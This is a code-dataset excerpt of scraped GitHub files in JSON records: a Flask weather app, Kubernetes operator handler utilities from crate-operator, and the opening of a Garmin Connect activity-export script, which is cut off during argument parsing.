{"api_name": "tensorflow.keras.models.Model", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 92, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Reshape", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2DTranspose", "line_number": 107, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 114, "usage_type": 
"call"}, {"api_name": "tensorflow.keras.models.Model", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.split", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 146, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 153, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 153, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "38951854960", "text": "import json\nimport requests\nfrom flask import Flask\nfrom flask import render_template, redirect, url_for, flash, request\nfrom weather import app\nfrom weather.forms import Searchform\n@app.route('/',methods=['GET','POST'])\n@app.route('/home',methods=['GET','POST'])\ndef home_view():\n cities = ['Dhaka','Mumbai','Lahore','New York','London','Paris','Colombo','Rome','Munich','Stockholm']\n result = []\n feels_like = []\n resulth = []\n wind = []\n sky_status = []\n for city in cities:\n final_url = f'http://api.weatherapi.com/v1/current.json?key=eda33b43c4b344ca886161433222401&q={city}'\n dt = requests.get(final_url)\n data = dt.json()\n print(data)\n wt1 = data['current']['temp_c']\n wt2 = data['current']['humidity']\n wt3 = data['current']['feelslike_c']\n wt4 = data['current']['wind_kph']\n wt5 = data['current']['condition']['text'] \n result.append(wt1)\n resulth.append(wt2)\n result.append(wt1)\n resulth.append(wt2)\n feels_like.append(wt3)\n wind.append(wt4)\n sky_status.append(wt5)\n print(wt1)\n return render_template('home.html',title='Home page',temperatures=result,humidities=resulth,wind=wind,feels_like=feels_like,condition=sky_status,cities=cities)\n\n@app.route('/location',methods=['GET','POST'])\ndef get_location_update():\n form = Searchform()\n location = None\n r = False\n result = []\n feels_like = []\n resulth = []\n wind = []\n sky_status = []\n fr = []\n if request.method == 'POST':\n location = request.form.get('location')\n if location:\n final_url = f'http://api.weatherapi.com/v1/current.json?key=eda33b43c4b344ca886161433222401&q={location}'\n dt = requests.get(final_url)\n data = dt.json()\n print(data)\n if 'error' in data:\n flash(f'City name is not valid. 
Please provide a valid city','danger')\n            else:\n                wt1 = data['current']['temp_c']\n                wt2 = data['current']['humidity']\n                wt3 = data['current']['feelslike_c']\n                wt4 = data['current']['wind_kph']\n                wt5 = data['current']['condition']['text'] \n                result.append(wt1)\n                resulth.append(wt2)\n                feels_like.append(wt3)\n                wind.append(wt4)\n                sky_status.append(wt5)\n                fr.append(result)\n                fr.append(resulth)\n                fr.append(feels_like)\n                fr.append(wind)\n                fr.append(sky_status)\n                r = True\n                redirect(url_for('get_location_update'))  # note: return value is discarded; the results are rendered below\n        else:\n            flash('An error occurred. Please try again')\n        \n    return render_template('specific.html',r=r,form=form,location=location,fr=fr)\n    \n\n", "repo_name": "Tareq69/Weather_update_app_using_Flask", "sub_path": "weather/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "weather.app.route", "line_number": 7, "usage_type": "call"}, {"api_name": "weather.app", "line_number": 7, "usage_type": "name"}, {"api_name": "weather.app.route", "line_number": 8, "usage_type": "call"}, {"api_name": "weather.app", "line_number": 8, "usage_type": "name"}, {"api_name": "weather.forms.Searchform", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 77, "usage_type": "call"}, {"api_name": "weather.app.route", "line_number": 36, "usage_type": "call"}, {"api_name": "weather.app", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "71656489765", "text": "import abc\nimport functools\nimport json\nimport logging\nfrom functools import wraps\nfrom typing import Any, Callable, Optional, TypedDict\n\nimport kopf\n\nfrom crate.operator.exceptions import SubHandlerFailedDependencyError\nfrom crate.operator.webhooks import (\n    WebhookEvent,\n    WebhookStatus,\n    WebhookSubPayload,\n    webhook_client,\n)\n\nfrom ..config import config\nfrom ..constants import KOPF_STATE_STORE_PREFIX\n\n\ndef subhandler_partial(awaitable: Callable, *args, **kwargs):\n    \"\"\"\n    A utility function to create a partial coroutine suitable for ``kopf.register``.\n\n    When scheduling asynchronous sub-handlers in Kopf, one needs to be careful\n    to not create coroutines when they're not used in an execution cycle.\n\n    >>> async def some_coro(arg1, kwarg1=None):\n    ...     pass\n    >>> kopf.register(\n    ...     fn=subhandler_partial(\n    ...         some_coro,\n    ...         'abc',\n    ...         kwarg1='foo',\n    ...     ),\n    ...     id=\"some-id\",\n    ... 
)\n \"\"\"\n\n @wraps(awaitable)\n async def _wrapper(**_):\n return await awaitable(*args, **kwargs)\n\n return _wrapper\n\n\nclass Notification(TypedDict):\n event: WebhookEvent\n payload: WebhookSubPayload\n status: WebhookStatus\n\n\nclass StateBasedSubHandler(abc.ABC):\n \"\"\"\n A handler capable of waiting for other handlers to finish.\n\n This can be expressed as a set of dependencies passed to the ``depends_on``\n parameter of the constructor.\n\n Basically, we wrap an actual handler here. Before executing the actual one,\n we check if the dependencies have completed yet - we do this by checking\n the statuses of those dependent handlers, as stored in the ``status`` field\n of the CrateDB resource.\n \"\"\"\n\n def __init__(\n self,\n namespace: str,\n name: str,\n ref: str,\n context: dict,\n depends_on=None,\n run_on_dep_failures=False,\n ):\n \"\"\"\n Constructs a new dependency-aware handler.\n\n :param namespace: the namespace to use\n :param name: the name of the CrateDB resource we're working on\n :param ref: reference for the current execution run.\n :param context: a dict allowing storage of status info between executions.\n :param depends_on: list of dependent handler this handler should wait for.\n :param run_on_dep_failures: whether we should still execute if our dependencies\n have failed. This is useful for handlers that clean up resources after\n other handlers have finished, and always need to run.\n \"\"\"\n self.namespace = namespace\n self.name = name\n self.ref = ref\n self._context = context\n self.depends_on = depends_on if depends_on is not None else []\n self.run_on_dep_failures = run_on_dep_failures\n\n def __call__(self, **kwargs: Any):\n return functools.partial(self._subhandler, **kwargs)\n\n async def _subhandler(self, **kwargs: Any):\n status = kwargs[\"status\"]\n annotations = kwargs[\"annotations\"]\n logger = kwargs[\"logger\"]\n waiting_for = []\n for dependency in self.depends_on:\n if self._get_status(status, dependency, logger) is None:\n if self._should_run_on_failed_dependency(\n annotations, dependency, logger\n ):\n continue\n\n waiting_for.append(dependency)\n\n if len(waiting_for) > 0:\n wt = \",\".join(waiting_for)\n # If running in testing mode (i.e. running ITs) we can reduce the delay\n # significantly as things generally move fast.\n raise kopf.TemporaryError(\n f\"Waiting for '{wt}'.\", delay=5 if config.TESTING else 30\n )\n\n try:\n res = await self.handle(**kwargs)\n return {\"success\": True, \"ref\": self.ref, \"result\": res}\n except Exception as e:\n if isinstance(e, kopf.TemporaryError) or isinstance(e, kopf.PermanentError):\n raise\n # The message gets sent to the k8s event log, and exc_info is found in\n # the main log of the operator. 
It's useful to have the message in\n # the event log too, as that one is easier to follow.\n logger.exception(f\"Uncaught exception in handler: {e}\", exc_info=e)\n raise\n\n @abc.abstractmethod\n async def handle(self, **kwargs: Any):\n raise NotImplementedError()\n\n def schedule_notification(\n self,\n event: WebhookEvent,\n payload: WebhookSubPayload,\n status: WebhookStatus,\n ):\n self._context.setdefault(\"notifications\", []).append(\n Notification(event=event, payload=payload, status=status)\n )\n\n async def send_registered_notifications(self, logger: logging.Logger):\n for notification in self._context.get(\"notifications\", []):\n await self.send_notification_now(\n logger,\n WebhookEvent(notification[\"event\"]),\n notification[\"payload\"],\n WebhookStatus(notification[\"status\"]),\n )\n self._context.get(\"notifications\", []).clear()\n\n async def send_notification_now(\n self,\n logger: logging.Logger,\n event: WebhookEvent,\n payload: WebhookSubPayload,\n status: WebhookStatus,\n ):\n await send_webhook_notification(\n self.namespace, self.name, logger, event, payload, status\n )\n\n def _get_status(self, statuses: dict, dependency: str, logger) -> Optional[dict]:\n \"\"\"\n Get the status of the specified dependency, obeying the ref.\n \"\"\"\n status = statuses.get(dependency, None)\n if not status:\n return None\n\n if status.get(\"ref\", None) != self.ref:\n logger.debug(\n \"Ignoring status for '%s' from previous run: %s\", dependency, status\n )\n return None\n\n return status\n\n def _should_run_on_failed_dependency(\n self, annotations: dict, handler_name: str, logger: logging.Logger\n ) -> bool:\n \"\"\"\n There is no way in kopf to say if a certain handler has failed or not.\n\n What we are doing instead is peeking into kopf's internal state storage -\n the annotations on the CrateDB objects to check if the handler has failed.\n\n Slightly naughty, but there is no better way at the time of writing.\n \"\"\"\n # Use the same procedure as kopf to create the handler name for the\n # annotations lookup. Important if the handler name exceeds the maximum\n # allowed length of 63 chars which is likely for @kopf.on.field() handlers\n # that have the field path in the name.\n progressor = kopf.AnnotationsProgressStorage(\n v1=False, prefix=KOPF_STATE_STORE_PREFIX\n )\n key = progressor.make_v2_key(handler_name)\n status_str = annotations.get(key)\n if not status_str:\n return False\n status = json.loads(status_str)\n if not status[\"success\"] and status[\"failure\"]:\n if self.run_on_dep_failures:\n logger.warning(\n f\"Our dependency ({handler_name}) has failed but we'll still run.\"\n )\n return True\n else:\n raise SubHandlerFailedDependencyError(\n f\"A dependency ({handler_name}) has failed. 
Giving up.\"\n )\n\n return False\n\n\nasync def send_webhook_notification(\n namespace: str,\n name: str,\n logger: logging.Logger,\n event: WebhookEvent,\n payload: WebhookSubPayload,\n status: WebhookStatus,\n):\n notification = Notification(event=event, payload=payload, status=status)\n logger.info(\n \"Sending %s notification event %s with payload %s\",\n notification[\"status\"],\n notification[\"event\"],\n notification[\"payload\"],\n )\n await webhook_client.send_notification(\n namespace,\n name,\n notification[\"event\"],\n notification[\"payload\"],\n notification[\"status\"],\n logger,\n )\n", "repo_name": "crate/crate-operator", "sub_path": "crate/operator/utils/kopf.py", "file_name": "kopf.py", "file_ext": "py", "file_size_in_byte": 8186, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Callable", "line_number": 22, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 41, "usage_type": "call"}, {"api_name": "typing.TypedDict", "line_number": 48, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 49, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 50, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 51, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 95, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 96, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 98, "usage_type": "name"}, {"api_name": "kopf.TemporaryError", "line_number": 116, "usage_type": "call"}, {"api_name": "config.config.TESTING", "line_number": 117, "usage_type": "attribute"}, {"api_name": "config.config", "line_number": 117, "usage_type": "name"}, {"api_name": "kopf.TemporaryError", "line_number": 124, "usage_type": "attribute"}, {"api_name": "kopf.PermanentError", "line_number": 124, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 132, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 138, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 139, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 140, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 146, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 150, "usage_type": "call"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 152, "usage_type": "call"}, {"api_name": "logging.Logger", "line_number": 158, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 159, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 160, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 161, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 167, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 184, "usage_type": "attribute"}, {"api_name": "kopf.AnnotationsProgressStorage", "line_number": 198, "usage_type": "call"}, {"api_name": "constants.KOPF_STATE_STORE_PREFIX", "line_number": 199, "usage_type": "name"}, {"api_name": "json.loads", 
"line_number": 205, "usage_type": "call"}, {"api_name": "crate.operator.exceptions.SubHandlerFailedDependencyError", "line_number": 213, "usage_type": "call"}, {"api_name": "logging.Logger", "line_number": 223, "usage_type": "attribute"}, {"api_name": "crate.operator.webhooks.WebhookEvent", "line_number": 224, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookSubPayload", "line_number": 225, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.WebhookStatus", "line_number": 226, "usage_type": "name"}, {"api_name": "crate.operator.webhooks.webhook_client.send_notification", "line_number": 235, "usage_type": "call"}, {"api_name": "crate.operator.webhooks.webhook_client", "line_number": 235, "usage_type": "name"}]} +{"seq_id": "34755944537", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCLI for Garmin Connect - all activities exporter\n\"\"\"\n\nfrom datetime import datetime, timedelta, tzinfo\nfrom getpass import getpass\nfrom math import floor\nfrom platform import python_version\nfrom subprocess import call\nfrom timeit import default_timer as timer\n\nimport argparse\nimport csv\nimport io\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport string\nimport sys\nimport unicodedata\nimport zipfile\n\nimport http.cookiejar\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nimport urllib\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlencode\nfrom urllib.request import Request\n\n\nfrom filtering import update_download_stats, read_exclude\n\n\nCOOKIE_JAR = http.cookiejar.CookieJar()\nOPENER = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(COOKIE_JAR), urllib.request.HTTPSHandler(debuglevel=0))\n\nSCRIPT_VERSION = '1.0.0'\n\n# it's almost the datetime format that is used by Garmin in the activity-search-service\nALMOST_RFC_1123 = \"%a, %d %b %Y %H:%M\" # JSON display fields - Garmin didn't zero-pad the date and the hour, but %d and %H do\n\nVALID_FILENAME_CHARS = f\"-_.() {string.ascii_letters}{string.digits}\"\n\n# mapping of numeric parentTypeId to names in CSV output\nPARENT_TYPE_ID = {\n 1: 'running',\n 2: 'cycling',\n 3: 'hiking',\n 4: 'other',\n 9: 'walking',\n 17: 'any',\n 26: 'swimming',\n 29: 'fitness_equipment',\n 71: 'motorcycling',\n 83: 'transition',\n 144: 'diving',\n 149: 'yoga',\n 165: 'winter_sports'\n}\n\n# which typeId value should use pace instead of speed\nUSES_PACE = {1, 3, 9, 26} # running, hiking, walking, swimming\n\nHR_ZONES_EMPTY = [None]*5\n\n# max number of a ctivities that can be requested at once - but the limit is not known. 
1000 should work\nLIMIT_MAXIMUM = 1000\n\nMAX_TRIES = 3\n\nCSV_TEMPLATE = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'csv_header_default.properties')\n\nWEBHOST = 'https://connect.garmin.com'\nREDIRECT = 'https://connect.garmin.com/modern/'\nBASE_URL = 'https://connect.garmin.com/en-US/signin'\nSSO = 'https://sso.garmin.com/sso'\nCSS = 'https://static.garmincdn.com/com.garmin.connect/ui/css/gauth-custom-v1.2-min.css'\n\nDATA = {\n 'service': REDIRECT,\n 'webhost': WEBHOST,\n 'source': BASE_URL,\n 'redirectAfterAccountLoginUrl': REDIRECT,\n 'redirectAfterAccountCreationUrl': REDIRECT,\n 'gauthHost': SSO,\n 'locale': 'en_US',\n 'id': 'gauth-widget',\n 'cssUrl': CSS,\n 'clientId': 'GarminConnect',\n 'rememberMeShown': 'true',\n 'rememberMeChecked': 'false',\n 'createAccountShown': 'true',\n 'openCreateAccount': 'false',\n 'displayNameShown': 'false',\n 'consumeServiceTicket': 'false',\n 'initialFocus': 'true',\n 'embedWidget': 'false',\n 'generateExtraServiceTicket': 'true',\n 'generateTwoExtraServiceTickets': 'false',\n 'generateNoServiceticket': 'false',\n 'globalOptInShown': 'true',\n 'globalOptInChecked': 'false',\n 'mobile': 'false',\n 'connectLegalTerms': 'true',\n 'locationPromptShown': 'true',\n 'showPassword': 'true'\n}\n\n# URLs for various services\n\nURL_GC_LOGIN = 'https://sso.garmin.com/sso/signin?' + urlencode(DATA)\nURL_GC_POST_AUTH = 'https://connect.garmin.com/modern/activities?'\nURL_GC_PROFILE = 'https://connect.garmin.com/modern/profile'\nURL_GC_USERSTATS = 'https://connect.garmin.com/modern/proxy/userstats-service/statistics/'\nURL_GC_LIST = 'https://connect.garmin.com/modern/proxy/activitylist-service/activities/search/activities?'\nURL_GC_ACTIVITY = 'https://connect.garmin.com/modern/proxy/activity-service/activity/'\nURL_GC_DEVICE = 'https://connect.garmin.com/modern/proxy/device-service/deviceservice/app-info/'\nURL_GC_GEAR = 'https://connect.garmin.com/modern/proxy/gear-service/gear/filterGear?activityId='\nURL_GC_ACT_PROPS = 'https://connect.garmin.com/modern/main/js/properties/activity_types/activity_types.properties'\nURL_GC_EVT_PROPS = 'https://connect.garmin.com/modern/main/js/properties/event_types/event_types.properties'\nURL_GC_GPX_ACTIVITY = 'https://connect.garmin.com/modern/proxy/download-service/export/gpx/activity/'\nURL_GC_TCX_ACTIVITY = 'https://connect.garmin.com/modern/proxy/download-service/export/tcx/activity/'\nURL_GC_ORIGINAL_ACTIVITY = 'http://connect.garmin.com/proxy/download-service/files/activity/'\n\n\ndef resolve_path(directory, subdir, time):\n \"\"\"\n Replace time variables and returns changed path. 
Supported placeholders are {YYYY} and {MM}.\n    :param directory: export root directory\n    :param subdir: subdirectory that can have placeholders\n    :param time: date-time-string\n    :return: updated directory string\n    \"\"\"\n    ret = os.path.join(directory, subdir)\n    if re.compile(\".*{YYYY}.*\").match(ret):\n        ret = ret.replace(\"{YYYY}\", time[0:4])\n    if re.compile(\".*{MM}.*\").match(ret):\n        ret = ret.replace(\"{MM}\", time[5:7])\n\n    return ret\n\n\ndef hhmmss_from_seconds(sec):\n    \"\"\"\n    Converting seconds to HH:MM:SS time format.\n    \"\"\"\n    if isinstance(sec, (float, int)):\n        formatted_time = str(timedelta(seconds=int(sec))).zfill(8)\n    else:\n        formatted_time = '0.000'\n    return formatted_time\n\n\ndef kmh_from_mps(mps):\n    \"\"\"\n    Converting meters per second (mps) to km/h.\n    \"\"\"\n    return str(mps * 3.6)\n\n\ndef sanitize_filename(name, max_length=0):\n    \"\"\"\n    Removing or replacing characters that are unsafe for filenames.\n    \"\"\"\n    cleaned_filename = unicodedata.normalize('NFKD', name) if name else ''\n    stripped_filename = ''.join(c for c in cleaned_filename if c in VALID_FILENAME_CHARS).replace(' ', '_')\n    return stripped_filename[:max_length] if max_length > 0 else stripped_filename\n\n\ndef write_to_file(filename, content, mode='w', file_time=None):\n    \"\"\"\n    Helper function that persists content to a file.\n    :param filename: name of the file to write\n    :param content: content to write; can be 'bytes' or 'str'\n        If it is 'bytes' and the mode 'w', it will be converted/decoded.\n    :param mode: 'w' or 'wb'\n    :param file_time: if given use as timestamp for the file written (in seconds since 1970-01-01)\n    \"\"\"\n    if mode == 'w':\n        write_file = io.open(filename, mode, encoding='utf-8')\n        if isinstance(content, bytes):\n            content = content.decode('utf-8')\n    elif mode == 'wb':\n        write_file = io.open(filename, mode) # binary mode must not specify a text encoding\n    else:\n        raise Exception('Unsupported file mode: ', mode)\n    write_file.write(content)\n    write_file.close()\n    if file_time:\n        os.utime(filename, (file_time, file_time))\n\n\ndef http_req(url, post=None, headers=None):\n    \"\"\"\n    Making HTTP requests.\n    :param url: URL for the request\n    :param post: dictionary of POST parameters\n    :param headers: dictionary of headers\n    :return: response body (type 'bytes')\n    \"\"\"\n    request = Request(url)\n\n    # supported browsers\n    request.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2816.0 Safari/537.36')\n    request.add_header('nk', 'NT') # necessary to avoid HTTP error code 402\n    if headers:\n        for header_key, header_value in headers.items():\n            request.add_header(header_key, header_value)\n    if post:\n        post = urlencode(post) # convert dictionary to POST parameter string.\n        post = post.encode('utf-8')\n    start_time = timer()\n\n    try:\n        response = OPENER.open(request, data=post)\n    except HTTPError as ex:\n        if hasattr(ex, 'code'):\n            logging.error(\"Server couldn't fulfill the request, code %s, error: %s\", ex.code, ex)\n            logging.info('Headers returned:\\n%s', ex.info())\n        raise\n    except URLError as ex:\n        if hasattr(ex, 'reason'):\n            logging.error('Failed to reach url %s, error: %s', url, ex)\n        raise\n    logging.debug('Got %s in %s s from %s', response.getcode(), timer() - start_time, url)\n    logging.debug('Headers returned: \\n%s', response.info())\n\n    if response.getcode() == 204:\n        # 204 = no content, e.g. 
for activities without GPS coordinates there is no GPX download.\n        # Write an empty file to prevent redownloading it.\n        logging.info('Got 204 for %s, returning empty response', url)\n        return b''\n    if response.getcode() != 200:\n        raise Exception(f'Bad return code ({response.getcode()}) for: {url}')\n\n    return response.read()\n\n\ndef http_req_as_string(url, post=None, headers=None):\n    \"\"\"\n    Making HTTP requests, returning a string instead of bytes.\n    \"\"\"\n    return http_req(url, post, headers).decode()\n\n\ndef load_properties(multiline, separator='=', comment_char='#', keys=None):\n    \"\"\"\n    Reading multiline string of properties (key-value pair separated by *separator*) into a dict.\n\n    :param multiline: input string of properties\n    :param separator: separator between key and value\n    :param comment_char: lines starting with this char are considered as comments, not key-value pairs\n    :param keys: list to append the keys to\n    :return:\n    \"\"\"\n    properties = {}\n    for line in multiline.splitlines():\n        stripped_line = line.strip()\n        if stripped_line and not stripped_line.startswith(comment_char):\n            key_value = stripped_line.split(separator)\n            key = key_value[0].strip()\n            value = separator.join(key_value[1:]).strip().strip('\"')\n            properties[key] = value\n            if keys is not None:\n                keys.append(key)\n    return properties\n\n\ndef value_if_found_else_key(some_dict, key):\n    \"\"\"\n    Lookup a value in some_dict and use the key itself as a fallback.\n    \"\"\"\n    return some_dict.get(key, key)\n\n\ndef present(element, act):\n    \"\"\"\n    Returning True if act[element] is valid and not None.\n    \"\"\"\n    if not act or element not in act: # 'or', not 'and': never look up a key in an empty/None dict\n        return False\n    return act[element]\n\n\ndef absent_or_null(element, act):\n    \"\"\"\n    Return False only if act[element] is valid and not None.\n    \"\"\"\n    if not act or element not in act: # 'or', not 'and': never look up a key in an empty/None dict\n        return True\n    if act[element]:\n        return False\n    return True\n\n\ndef from_activities_or_details(element, act, detail, detail_container):\n    \"\"\"\n    Return detail[detail_container][element] if valid and act[element] (or None) otherwise.\n    \"\"\"\n    if absent_or_null(detail_container, detail) or absent_or_null(element, detail[detail_container]):\n        return None if absent_or_null(element, act) else act[element]\n    return detail[detail_container][element]\n\n\ndef trunc6(some_float):\n    \"\"\"\n    Return the given float as a string formatted with six digit precision.\n    \"\"\"\n    return \"{0:12.6f}\".format(floor(some_float * 1000000) / 1000000).lstrip()\n\n\nclass FixedOffset(tzinfo):\n    \"\"\"\n    Fixed offset in minutes east from UTC.\n    \"\"\"\n\n    def __init__(self, offset, name):\n        super().__init__()\n        self.__offset = timedelta(minutes=offset)\n        self.__name = name\n\n\n    def utcoffset(self, dt): # must be named 'utcoffset' to override tzinfo's method\n        return self.__offset\n\n    def tzname(self, dt):\n        return self.__name\n\n    def dst(self, dt):\n        return timedelta(0)\n\n\ndef offset_date_time(time_local, time_gmt):\n    \"\"\"\n    Building an 'aware' datetime from two naive datetime objects (that is timestamps as present in the activitylist-service.json), using the time difference as offset.\n    \"\"\"\n    local_dt = datetime_from_iso(time_local)\n    gmt_dt = datetime_from_iso(time_gmt)\n    offset = local_dt - gmt_dt\n    offset_tz = FixedOffset(offset.seconds // 60, \"LCL\")\n    return local_dt.replace(tzinfo=offset_tz)\n\ndef datetime_from_iso(iso_date_time):\n    \"\"\"\n    Calling 'datetime.strptime' supporting different ISO time formats\n    (with or without 'T' between date and time, with or without microseconds, but without offset).\n    :param iso_date_time: timestamp string 
in ISO format\n    :return: a 'naive' datetime\n    \"\"\"\n    pattern = re.compile(r\"(\\d{4}-\\d{2}-\\d{2})[T ](\\d{2}:\\d{2}:\\d{2})(\\.\\d+)?\")\n    match = pattern.match(iso_date_time)\n    if not match:\n        raise Exception(f'Invalid ISO timestamp {iso_date_time}.')\n    micros = match.group(3) if match.group(3) else \".0\"\n    iso_with_micros = f'{match.group(1)} {match.group(2)}{micros}'\n    return datetime.strptime(iso_with_micros, \"%Y-%m-%d %H:%M:%S.%f\")\n\n\ndef epoch_seconds_from_summary(summary):\n    \"\"\"\n    Function determining the start time in epoch seconds (seconds since 1970-01-01).\n    :param summary: summary dict\n    :return: epoch seconds as integer\n    \"\"\"\n    if present('beginTimestamp', summary):\n        return summary['beginTimestamp'] // 1000\n    if present('startTimeLocal', summary) and present('startTimeGMT', summary):\n        dt = offset_date_time(summary['startTimeLocal'], summary['startTimeGMT'])\n        return int(dt.timestamp())\n    logging.info('No timestamp found in activity %s', summary['activityId'])\n    return None\n\n\ndef pace_or_speed_raw(type_id, parent_type_id, mps):\n    \"\"\"\n    Convert speed (m/s) to speed (km/h) or pace (min/km) depending on type and parent type. \n    \"\"\"\n    kmh = 3.6 * mps\n    if (type_id in USES_PACE) or (parent_type_id in USES_PACE):\n        return 60/kmh\n    return kmh\n\n\ndef pace_or_speed_formatted(type_id, parent_type_id, mps):\n    \"\"\"\n    Convert speed (m/s) to string: speed (km/h as x.x) or pace (min/km as MM:SS),\n    depending on type and parent type.\n    \"\"\"\n    kmh = 3.6 * mps\n    if (type_id in USES_PACE) or (parent_type_id in USES_PACE):\n        return '{0:02d}:{1:02d}'.format(*divmod(int(round(3600/kmh)), 60))\n    return \"{0:.1f}\".format(round(kmh, 1))\n\n\nclass CsvFilter:\n    \"\"\"\n    Collects, filters and writes CSV files.\n    \"\"\"\n\n    def __init__(self, csv_file, csv_header_properties):\n        self.__csv_file = csv_file\n        with open(csv_header_properties, 'r', encoding=\"utf-8\") as properties:\n            csv_header_properties = properties.read()\n        self.__csv_columns = []\n        self.__csv_headers = load_properties(csv_header_properties, keys=self.__csv_columns)\n        self.__csv_field_names = []\n        for column in self.__csv_columns:\n            self.__csv_field_names.append(self.__csv_headers[column])\n        self.__writer = csv.DictWriter(self.__csv_file, fieldnames=self.__csv_field_names, quoting=csv.QUOTE_ALL)\n        self.__current_row = {}\n\n    def write_header(self):\n        \"\"\"\n        Writing the active column names as CSV headers.\n        \"\"\"\n        self.__writer.writeheader()\n\n    def write_row(self):\n        \"\"\"\n        Writing the prepared CSV record.\n        \"\"\"\n        self.__writer.writerow(self.__current_row)\n        self.__current_row = {}\n\n    def set_column(self, name, value):\n        \"\"\"\n        Storing a column value (if the column is active) into the record prepared for the next write_row call\n        \"\"\"\n        if value and name in self.__csv_columns:\n            self.__current_row[self.__csv_headers[name]] = value\n\n    def is_column_active(self, name):\n        \"\"\"\n        Return True if the column is present in the header template.\n        \"\"\"\n        return name in self.__csv_columns\n\ndef parse_arguments(argv):\n    \"\"\"\n    Set up the argument parser and parse the command line arguments.\n    \"\"\"\n    current_date = datetime.now().strftime('%Y-%m-%d')\n    activities_directory = f'./{current_date}_garmin_connect_export'\n\n    parser = argparse.ArgumentParser(description='Garmin Connect Exporter')\n\n    parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + SCRIPT_VERSION,\n                        help='print version and exit')\n    parser.add_argument('-vv', '--verbosity', action='count', default=0,\n                        
